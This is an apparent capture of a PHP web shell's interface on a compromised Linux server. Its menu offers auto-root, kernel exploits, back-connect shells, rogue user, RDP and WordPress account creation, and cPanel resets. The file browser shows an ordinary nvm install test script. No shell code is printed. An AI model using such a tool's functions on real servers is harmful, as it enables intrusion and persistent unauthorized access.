Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.141.202.216
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
nvm /
test /
installation_node /
[ HOME SHELL ]
Name
Size
Permission
Action
default-packages
2.6
KB
-rwxrwxr-x
install LTS
1.26
KB
-rwxrwxr-x
install already installed uses...
705
B
-rwxrwxr-x
install from binary
678
B
-rwxrwxr-x
install from source
834
B
-rwxrwxr-x
install from source implicitly
587
B
-rwxrwxr-x
install from source with threa...
950
B
-rwxrwxr-x
install from source without V8...
762
B
-rwxrwxr-x
install hook
1.37
KB
-rwxrwxr-x
install latest npm
1.82
KB
-rwxrwxr-x
install two versions and use t...
682
B
-rwxrwxr-x
install version specified in ....
510
B
-rwxrwxr-x
install version specified in ....
514
B
-rwxrwxr-x
install while reinstalling pac...
1.53
KB
-rwxrwxr-x
install with --alias
244
B
-rwxrwxr-x
install with --default
251
B
-rwxrwxr-x
install with --latest-npm
269
B
-rwxrwxr-x
setup_dir
62
B
-rwxrwxr-x
teardown_dir
268
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : default-packages
#!/bin/sh FILE="$NVM_DIR/default-packages" die () { echo "$@" ; cleanup ; exit 1; } setup () { if [ -f $FILE ]; then ORIG_DEFAULT_PACKAGES=$(cat $FILE) mkdir ./tmp/ ||: mv $FILE ./tmp/default-packages ||: fi touch $FILE } cleanup () { rm -rf "$(nvm_version_path v6.10.1)" $FILE if [ "$ORIG_DEFAULT_PACKAGES" != "" ]; then rm -rf ./tmp/ echo "$ORIG_DEFAULT_PACKAGES" > $FILE fi } setup \. ../../nvm.sh cat > $FILE << EOF rimraf object-inspect@1.0.2 # commented-package stevemao/left-pad daytime EOF printf %s "$(cat "${FILE}")" > $FILE # strip trailing newline nvm install v6.10.1 2>&1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_0" ] || die "expected 'nvm install v6.10.1' to exit with 0, got $EXIT_CODE" nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'rimraf' if [ -z "$?" ]; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'rimraf'' to exit with 0, got $?" fi nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'daytime' if [ -z "$?" ]; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'daytime'' to exit with 0, got $?" fi cleanup setup \. ../../nvm.sh cat > $FILE << EOF rimraf object-inspect@1.0.2 # commented-package stevemao/left-pad EOF nvm install v6.10.1 --skip-default-packages 2>&1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_0" ] || die "expected 'nvm install v6.10.1' to exit with 0, got $EXIT_CODE" if nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'rimraf'; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'rimraf'' to be empty" fi cleanup setup cat > $FILE << EOF not~a~package~name EOF nvm install v6.10.1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_0" ] || die "expected 'nvm install v6.10.1' to exit with 0, got $EXIT_CODE" if nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'not~a~package~name'; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'not~a~package~name'' to exit with 1, got $?" fi cleanup setup cat > $FILE << EOF object-inspect @ 1.0.2 EOF nvm install v6.10.1 2>&1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_1" ] || die "expected 'nvm install v6.10.1' to exit with 1, got $EXIT_CODE" if nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'object-inspect'; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'object-inspect'' to exit with 1, got $?" fi cleanup setup rm -rf $FILE nvm install v6.10.1 2>&1 EXIT_CODE=$? [ "_$EXIT_CODE" = "_0" ] || die "expected 'nvm install v6.10.1' to exit with 0, got $EXIT_CODE" if nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'object-inspect'; then die "expected 'nvm exec v6.10.1 npm ls -g --depth=0 | grep -q 'object-inspect'' to exit with 1, got $?" fi touch $FILE cleanup
Close